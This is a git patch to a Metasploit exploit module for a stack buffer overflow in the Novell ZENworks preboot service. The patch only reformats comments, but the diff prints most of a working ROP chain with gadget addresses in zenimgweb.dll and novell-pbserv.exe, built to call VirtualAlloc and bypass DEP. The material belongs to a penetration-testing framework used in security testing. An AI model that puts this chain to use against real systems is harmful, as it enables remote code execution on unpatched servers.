From d51209a3cfda215ce05ecb37c8e5637a3bf73af9 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 19 Jul 2012 15:53:47 +0200 Subject: [PATCH] Beautify --- .../novell/zenworks_preboot_op6c_bof.rb | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb index d57602206c..89debd2b23 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb @@ -90,11 +90,11 @@ class Metasploit3 < Msf::Exploit::Remote if target.name =~ /Novell ZENworks Configuration Management 10 SP3/ rop_gadgets = [ - 0x100066b1, # POP EDX # MOV ESI,C4830005 # ADD AL,3B # RETN - 0x00001000, # 0x00001000-> edx - 0x100239df, # POP ECX # RETN [zenimgweb.dll] - 0x1007d158, # ptr to &VirtualAlloc() [IAT zenimgweb.dll] - 0x10018653, # MOV EAX,DWORD PTR DS:[ECX] # ADD ESP,20 # RETN ** [zenimgweb.dll] + 0x100066b1, # POP EDX # MOV ESI,C4830005 # ADD AL,3B # RETN [zenimgweb.dll] + 0x00001000, # 0x00001000-> edx + 0x100239df, # POP ECX # RETN [zenimgweb.dll] + 0x1007d158, # ptr to &VirtualAlloc() [IAT zenimgweb.dll] + 0x10018653, # MOV EAX,DWORD PTR DS:[ECX] # ADD ESP,20 # RETN [zenimgweb.dll] junk, # Filler (compensate) junk, # Filler (compensate) junk, # Filler (compensate) @@ -103,18 +103,18 @@ class Metasploit3 < Msf::Exploit::Remote junk, # Filler (compensate) junk, # Filler (compensate) junk, # Filler (compensate) - 0x1002a38f, # PUSH EAX # POP ESI # RETN ** [zenimgweb.dll] - 0x00423ddd, # POP EBP # RETN [novell-pbserv.exe] - 0x10007b22, # & push esp # ret [zenimgweb.dll] - 0x100235dc, # POP EBX # RETN [zenimgweb.dll] - 0x00000001, # 0x00000001-> ebx - 0x0041961a, # POP ECX # RETN [novell-pbserv.exe] - 0x00000040, # 0x00000040-> ecx - 0x1004702b, # POP EDI # RETN [zenimgweb.dll] - 0x1001d001, # RETN (ROP NOP) [zenimgweb.dll] - 0x10011217, # POP EAX # RETN [zenimgweb.dll] + 0x1002a38f, # PUSH EAX # POP ESI # RETN [zenimgweb.dll] + 0x00423ddd, # POP EBP # RETN [novell-pbserv.exe] + 0x10007b22, # & push esp # ret [zenimgweb.dll] + 0x100235dc, # POP EBX # RETN [zenimgweb.dll] + 0x00000001, # 0x00000001-> ebx + 0x0041961a, # POP ECX # RETN [novell-pbserv.exe] + 0x00000040, # 0x00000040-> ecx + 0x1004702b, # POP EDI # RETN [zenimgweb.dll] + 0x1001d001, # RETN (ROP NOP) [zenimgweb.dll] + 0x10011217, # POP EAX # RETN [zenimgweb.dll] nop, - 0x10018ec8, # PUSHAD # RETN [zenimgweb.dll] + 0x10018ec8, # PUSHAD # RETN [zenimgweb.dll] ].pack("V*") else # Novell ZENworks Configuration Management 10 SP2 rop_gadgets =